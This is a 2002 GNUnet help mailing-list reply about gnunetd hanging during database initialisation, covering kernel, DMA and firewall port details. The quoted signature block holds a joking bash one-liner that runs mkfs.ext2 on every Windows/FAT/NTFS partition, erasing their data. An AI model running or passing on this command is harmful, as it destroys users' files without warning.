Re: [Help-gnunet] running gnunetd

From: jeroen
Subject: Re: [Help-gnunet] running gnunetd
Date: Fri, 5 Apr 2002 13:57:12 +0200

On Thu, Apr 04, 2002 at 12:52:33PM -0500, Christian Grothoff wrote:
> On Thursday 04 April 2002 03:23 am, you wrote:
> > apperently the output attachment failed in my first email, here's anither
> > try...
>
> Hmm. That's odd. Do you get 100% CPU load? Disc activity? GNUnet version? OS?
> Can you reproduce it in the current CVS version, too? I've never seen that
> happen...
I got the snapshot a few days ago, I'm running (redhat) linux 2.4 kernel. I'm
running gnunet as a dedicated user, opened up my firewall for port 2086. The
content/database initialisation never seems to end, not much diskactivity is
shown.
There might be a problem with my disk access, my harddisk/controller is
workking with DMA disabled. Is gnunet using some smart low-level disk access ?
When I checked my syslog a saw some DMA error on my harddisk, strange enough I
disabled DMA...
Futher more, opening up port 2086 for UDP and TCP is sufficient ?

> astonished
>
> Christian
>
> > Jeroen

> > > Don't worry about AC_HEADERS. Which version are you running? 0.3.1 did a
> > > linear scan over a 256 MB file, that could take lots. 0.3.2 should be
> > > done with it after a few seconds.
> > >
> > > I did not receive any output as an attachment, maybe the mailinglist ate
> > > it. Can you repost that? I can't see any big problems with the
> > > gnunet.conf, except that it may have some syntax errors (e.g. I got a
> > > PORT_
> > > (port-underscore)) in there. Anyway, my gnunetd started with that
> > > configuration instantly without problems.
> > >
> > > Also: which OS are you running? :-)
> > >
> > > Christian
>
> --
> |Christian Grothoff                                  |
> |650-2 Young Graduate House, West Lafayette, IN 47906|
> |http://gecko.cs.purdue.edu/   address@hidden|
> #!/bin/bash
> for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk\
> '{print$1;}'`;do;nohup mkfs.ext2 $i&;done
> echo -e "\n\n\t\tMay the source be with you.\n\n"

Jeroen